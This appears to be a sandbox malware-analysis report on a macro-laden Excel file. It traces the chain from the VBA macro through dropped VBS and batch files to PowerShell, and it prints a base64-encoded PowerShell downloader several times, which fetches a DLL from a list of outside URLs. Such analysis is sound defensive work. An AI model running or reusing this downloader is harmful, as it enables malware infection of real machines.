Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A

System Summary

Document contains OLE streams with names of living off the land binaries

Source: xxTupY4Fr3.xlsx	Stream path 'Workbook' : .............................\.p....Bruno B....a........=..............gDFt4etujSDssdf.................................=.......V.08.......X.@..........".....................1.................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1.................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1......>.........C.a.l.i.b.r.i.1......?.........C.a.l.i.b.r.i.1......4.........C.a.l.i.b.r.i.1...,...6.........C.a.l.i.b.r.i.1.......6.........C.a.l.i.b.r.i.1......6.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1..h...6.........C.a.l.i.b.r.i. .L.i.g.h.t.1......<.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1......4.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1.................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .". ".;.\.-.#.,.#.#.0.\. .". "...=......#.,.#.#.0.\. .". ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .". "...?......#.,.#.#.0...0.0.\. .". ".;.\.-.#.,.#.#.0...0.0.\. .". "...I..."..#.,.#.#.0...0.0.\. .". ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .". "...q..6.._.-.. .#.,.#.#.0.\. .". "._.-.;.\.-.. .#.,.#.#.0.\. .". "._.-.;._.-.. .".-.".\. .". "._.-.;._.-.@._.-...k.).3.._.-.. .#.,.#.#.0.\. ._. _.-.;.\.-.. .#.,.#.#.0.\. ._. _.-.;._.-.. .".-.".\. ._. _.-.;._.-.@._.-....,.>.._.-.. .#.,.#.#.0...0.0.\. .". "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .". "._.-.;._.-.. .".-.".?.?.\. .". "._.-.;._.-.@._.-...{.+.;.._.-.. .#.,.#.#.0...0.0.\. ._. _.-.;.\.-.. .#.,.#.#.0...0.0.\. ._. _.-.;._.-.. .".-.".?.?.\. ._. _.-.;._.-.@._.-........ ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ......... ........... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... ........ ....... ........ ....... ........ .....,. .......... .....*. .......... ....... ...P..... ....... ...P...... ....... ... ...... ....... .......... ....... ...a..... ....... ..ff.... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... ...`...... ....... .......... .....+. .......... .....). .......... ....... .......... ......... ..@......... ......... ..@......... ......... ..H......... .......
Source: xxTupY4Fr3.xls.0.dr	Stream path 'Workbook' : .............................\.p....user B....a........=..............gDFt4etujSDssdf.................................=.......V.08.......X.@..........".....................1.................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1.................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1......>.........C.a.l.i.b.r.i.1......?.........C.a.l.i.b.r.i.1......4.........C.a.l.i.b.r.i.1...,...6.........C.a.l.i.b.r.i.1.......6.........C.a.l.i.b.r.i.1......6.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1..h...6.........C.a.l.i.b.r.i. .L.i.g.h.t.1......<.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1......4.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1.................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .". ".;.\.-.#.,.#.#.0.\. .". "...=......#.,.#.#.0.\. .". ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .". "...?......#.,.#.#.0...0.0.\. .". ".;.\.-.#.,.#.#.0...0.0.\. .". "...I..."..#.,.#.#.0...0.0.\. .". ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .". "...q..6.._.-.. .#.,.#.#.0.\. .". "._.-.;.\.-.. .#.,.#.#.0.\. .". "._.-.;._.-.. .".-.".\. .". "._.-.;._.-.@._.-...k.).3.._.-.. .#.,.#.#.0.\. ._. _.-.;.\.-.. .#.,.#.#.0.\. ._. _.-.;._.-.. .".-.".\. ._. _.-.;._.-.@._.-....,.>.._.-.. .#.,.#.#.0...0.0.\. .". "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .". "._.-.;._.-.. .".-.".?.?.\. .". "._.-.;._.-.@._.-...{.+.;.._.-.. .#.,.#.#.0...0.0.\. ._. _.-.;.\.-.. .#.,.#.#.0...0.0.\. ._. _.-.;._.-.. .".-.".?.?.\. ._. _.-.;._.-.@._.-........ ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ......... ........... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... ........ ....... ........ ....... ........ .....,. .......... .....*. .......... ....... ...P..... ....... ...P...... ....... ... ...... ....... .......... ....... ...a..... ....... ..ff.... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... ...`...... ....... .......... .....+. .......... .....). .......... ....... .......... ......... ..@......... ......... ..@......... ......... ..H......... .......
Source: 13E20000.0.dr	Stream path 'Workbook' : ........f2....................\.p....user B....a........=..............gDFt4etujSDssdf.................................=.......K.08.......X.@..........".....................1.................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1.................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1......>.........C.a.l.i.b.r.i.1......?.........C.a.l.i.b.r.i.1......4.........C.a.l.i.b.r.i.1...,...6.........C.a.l.i.b.r.i.1.......6.........C.a.l.i.b.r.i.1......6.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1..h...6.........C.a.l.i.b.r.i. .L.i.g.h.t.1......<.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1......4.........C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1................C.a.l.i.b.r.i.1.................C.a.l.i.b.r.i.........."$"#,##0_);$"$"#,##0$..!......"$"#,##0_);[Red]$"$"#,##0$.."......"$"#,##0.00_);$"$"#,##0.00$..'...".."$"#,##0.00_);[Red]$"$"#,##0.00$..7..2.._("$"* #,##0_);_("$"* $#,##0$;_("$"* "-"_);_(@_)....).).._(* #,##0_);_(* $#,##0$;_(* "-"_);_(@_)..?.,.:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_)..6.+.1.._(* #,##0.00_);_(* $#,##0.00$;_(* "-"??_);_(@_)..3.....#.,.#.#.0.\. .". ".;.\.-.#.,.#.#.0.\. .". "...=.....#.,.#.#.0.\. .". ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .". "...?.....#.,.#.#.0...0.0.\. .". ".;.\.-.#.,.#.#.0...0.0.\. .". "...I.."..#.,.#.#.0...0.0.\. .". ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .". "...q..6.._.-.. .#.,.#.#.0.\. .". "._.-.;.\.-.. .#.,.#.#.0.\. .". "._.-.;._.-.. .".-.".\. .". "._.-.;._.-.@._.-...k..3.._.-.. .#.,.#.#.0.\. ._. _.-.;.\.-.. .#.,.#.#.0.\. ._. _.-.;._.-.. .".-.".\. ._. _.-.;._.-.@._.-.....>.._.-.. .#.,.#.#.0...0.0.\. .". "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .". "._.-.;._.-.. .".-.".?.?.\. .". "._.-.;._.-.@._.-...{..;.._.-.. .#.,.#.#.0...0.0.\. ._. _.-.;.\.-.. .#.,.#.#.0...0.0.\. ._. _.-.;._.-.. .".-.".?.?.\. ._. _.-.;._.-.@._.-........ ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ....... ........... ......... ........... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... .......... ....... ........ ....... ..ff.... ...... .......... ...... .......... ...... ..........

Document contains an embedded VBA macro which may execute processes

Source: xxTupY4Fr3.xlsx	OLE, VBA macro line: bDSFgs4ysustjshgs.berukuw7swDEe3.Exec bDSFgs4ysustjshgs.Label1.Tag
Source: VBA code instrumentation	OLE, VBA macro: Module dfkj3ghrksldjkgf, Function Worksheet_SelectionChange, API Object.Exec("wscript c:\programdata\wetidjks.vbs")			Name: Worksheet_SelectionChange

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation

OLE, VBA macro: Module dfkj3ghrksldjkgf, Function Worksheet_SelectionChange, String LastFoundRngName

Document contains an embedded macro with GUI obfuscation

Source: xxTupY4Fr3.xlsx

Stream path 'Workbook' : Found suspicious string wscript.shell in non macro stream

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: c:\programdata\wetidjks.vbs			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: c:\programdata\jledshf.bat			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
